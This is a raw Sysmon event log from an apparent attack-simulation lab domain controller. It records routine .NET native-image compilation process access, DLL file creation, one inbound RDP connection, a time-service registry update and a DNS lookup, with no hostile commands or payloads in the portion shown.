13:45:04.876{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E0-6005-6501-00000000A301}1408C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:04.814{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4dc-0\System.Runtime.WindowsRuntime.dll2021-01-18 13:45:04.814 10341000x80000000000000005597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.142{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:04.142{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E0-6005-6401-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.142{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.142{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E1-6005-6701-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.064{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90E1-6005-6701-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:05.064{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E1-6005-6701-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:05.001{59A5CD1D-90E0-6005-6601-00000000A301}3916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f4c-0\System.Runtime.WindowsRuntime.UI.Xaml.dll2021-01-18 13:45:05.001 10341000x80000000000000005615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:07.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E3-6005-6901-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:07.501{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90E3-6005-6901-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:07.501{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E3-6005-6901-00000000A301}4684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:07.376{59A5CD1D-90E1-6005-6801-00000000A301}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b04-0\System.Runtime.Serialization.dll2021-01-18 13:45:07.376 10341000x80000000000000005618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:08.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:08.220{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:08.220{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x80000000000000005619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localRDP2021-01-18 13:45:20.665{59A5CD1D-8E46-6005-0F00-00000000A301}1116C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse66.36.234.250-27189-false10.0.1.14win-dc-495.attackrange.local3389ms-wbt-server 13241300x80000000000000005621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:45:23.595{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6eda0-0x2b982963) 11241100x80000000000000005620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:23.532{59A5CD1D-90E4-6005-6A01-00000000A301}2844C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b1c-0\System.ServiceModel.dll2021-01-18 13:45:23.532 10341000x80000000000000005628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000005627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:22.562{59A5CD1D-8E56-6005-2E00-00000000A301}2464250.234.36.66.in-addr.arpa.9003-C:\Windows\sysmon64.exe 10341000x80000000000000005626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.563{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.563{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.126{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90F4-6005-6B01-00000000A301}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.110{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-90F4-6005-6B01-00000000A301}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:24.110{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-90F4-6005-6B01-00000000A301}4820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:45:29.438{59A5CD1D-8E46-6005-0D00-00000000A301}6284704C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:45:34.969{59A5CD1D-90F4-6005-6C01-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1224-0\PresentationCore.dll2021-01-18 13:45:34.969 10341000x80000000000000005633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 